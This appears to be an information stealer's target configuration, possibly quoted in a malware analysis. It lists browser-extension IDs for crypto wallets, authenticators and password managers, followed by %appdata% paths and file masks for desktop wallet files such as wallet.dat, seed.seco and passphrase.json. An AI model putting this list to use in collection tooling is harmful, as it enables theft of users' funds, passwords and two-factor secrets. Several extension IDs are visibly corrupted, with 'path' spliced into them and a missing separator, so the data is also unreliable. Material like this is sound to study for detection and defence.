• TronLink|ibnejdfjmmkpcnlpebklmnkoeoihofec
• Binance Chain Wallet|fhbohimaelbohpjbbldcngcnapndodjp
• Yoroi|ffnbelfdoeiohenkjibnmadjiehjhajb
• Nifty Walletjbdaocneiiinmjbjlgalhcelgbejmnpath
• Math Wallet|afbcbjpbpfadlkmhmclhkeeodmamcflc
• Temple|ookjlbkiijinhpmnjffcofjonbfbgaoc
• TezBox|mnfifefkajgofkcjkempathiaecocnkjeh
• DAppPlay|lodccjjbdhfakaekdiahmedfbieldgik
• BitClip|ijmpgkjfkbfhoebgogflfebnmejmfbml
• Steem Keychain|lkcjlnjfpbikmcmbachjpdbijejflpcm
• Nash Extension|onofpnbbkehpmmoabgpcpmigafmmnjhl
• Hycon Lite Client|bcopgchhojmggmffilplmbdicgaihlkp
• ZilPay|klnaejjgbibmhlephnhpmaofohgkpgkd
• Coin98 Wallet|aeachknmefphepccionboohckonoeemg
• Authenticator|bhghoamapcdpbohphigoooaddinpkbai
• Cyano Wallet|dkdedlpgdmmkkfjabffeganieamfklkm
• Byone|nlgbhdfgdhgbiamfdfmbikcdghpathoadd
• OneKey|infeboajgfhgbjpjbeppbkgnabfdkdaf
• LeafWallet|cihmoadaighcejopammfbmddcmdekcje
• Authy|gaedmjdfmmahhbjefcbgaolhhanlaolb
• EOS Authenticator|oeljdldpnmdbchonielpathgobddffflal
• GAuth Authenticator|ilgcnhelpchnceeipipijaljkblbcobl
• Trezor Password Manager|imloifkgjagghnncjkhggdhalmcnfklk
• Ever|cgeeodpfagjceefieflmdfphplkenlfk
• KardiaChain|pdadjkfkgcafgbceimcpbkalnfnepbnk
• Rabby|acmacodkjbdgmoleebolmdjonilkdbch
• Phantom|bfnaelmomeimhlpmgjnjophhpkkoljpa
• Oxygen|fhilaheimglignddkjgofkcbgekhenbh
• Pali|mgffkfbpathihjpoaomajlbgchddlicgpn
• XDEFI|hmeobnfnfcmdkdcmlblgagmfpfboieaf
• Nami|lpfcbjknijpeeillifnkikgncikgfhdo
• MultiversX DeFi Wallet|dngmlblcodfobpdpecaadgfbcggfjfnm
• Keeper|lpilbniiabackdjcionkobglmddfbcjo
• Softlare|bhhhlbepdkbapadjdnnojkbgioiodbic
• Govy|jnkelfanjkeadonecabehalmbgpfodjm
• SteemKeychain|jhgnbkkipaallpehbohjmkbjofjdmepath
• Braavos|jnlgamecbpmbajjfhmmmlhejkemejdma
• Enkrypt|kkpllkodjelopathieedojogacfhpaihoh
• OKX|mcohilncbfahbmgdjkbpemcciiolgcge
• HashPack|gjagmgpathdbbciopjhllkdnddhcglnemk
• Eternl|kmhcihpebfmpgmihbkipmjlmmioameka
• Pontem Aptos|phkbamefinggmakgklpkljjmgibohnba
• Martianin|efbglgofoippbgcjepnhiblaibcnclgk
• Finnie|cjmkndjhnagcfbpiemnkdpomccnjblmj
• Leap Terra|aijcbedoijmgnlmjeegjaglmepbmpkpi
• Dashlane|fdjamakpfbbddfjaooikfcpapjohcfmg
• NordPass|fooolghllnmhmmndgjiamiiodkpenpbb
• Roboform|pnlccmojcmeohlpggmfnbbiapkmbliob
• LastPass|hdokiejnpimakedhajhdlcegeplioahd
• BrowserPass|naepdomgkenhinolocfifgehpathddafch
• MYKI|bmikpgodpkclnkgmnpphehdgcimmpathed

Targeted Cryptocurrency Wallets

• Wallets/Jaxx Desktop|%appdata%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb|*.*|0
• Wallets/Atomic|%appdata%\atomic\Local Storage\leveldb|*.*|0
• Wallets/Binance|%appdata%\Binance|app-store.json,simple-storage.json,.finger-print.fp|0
• Wallets/Coinomi|%appdata%\Coinomi\Coinomi\wallets|.wallet,*.config|0
• Wallets/Exodus|%appdata%\Exodus|exodus.conf.json,window-state.json,passphrase.json,seed.seco,info.seco|1
• Wallets/Bitcoin Core|%appdata%\Bitcoin\wallets|wallet.dat|1
• Wallets/Bitcoin Core Old|%appdata%\Bitcoin|*wallet*.dat|0
• Wallets/Dogecoin|%appdata%\Bitcoin\wallets|*wallet*.dat|0
• Wallets/Raven Core|%appdata%\Raven|*wallet*.dat|0
• Wallets/Daedalus Mainnet|%appdata%\Daedalus Mainnet\wallets|she*.sqlite|0
• Wallets/Blockstream Green|%appdata%\Blockstream\Green\wallets|*.*|1
• Wallets/Wasabi Wallet|%appdata%\WalletWasabi\Client\Wallets|*.json|0
• Wallets/Ethereum|%appdata%\Ethereum|keystore|0
• Wallets/Electrum|%appdata%\Electrum\wallets|*.*|0
• Wallets/ElectrumLTC|%appdata%\Electrum-LTC\wallets|*.*|0
• Wallets/Electron Cash|%appdata%\ElectronCash\wallets|*.*|0
• Wallets/MultiDoge|%appdata%\MultiDoge|multidoge.wallet|0
• Wallets/Jaxx Desktop Old|%appdata%\jaxx\Local Storage|file__0.localstorage|0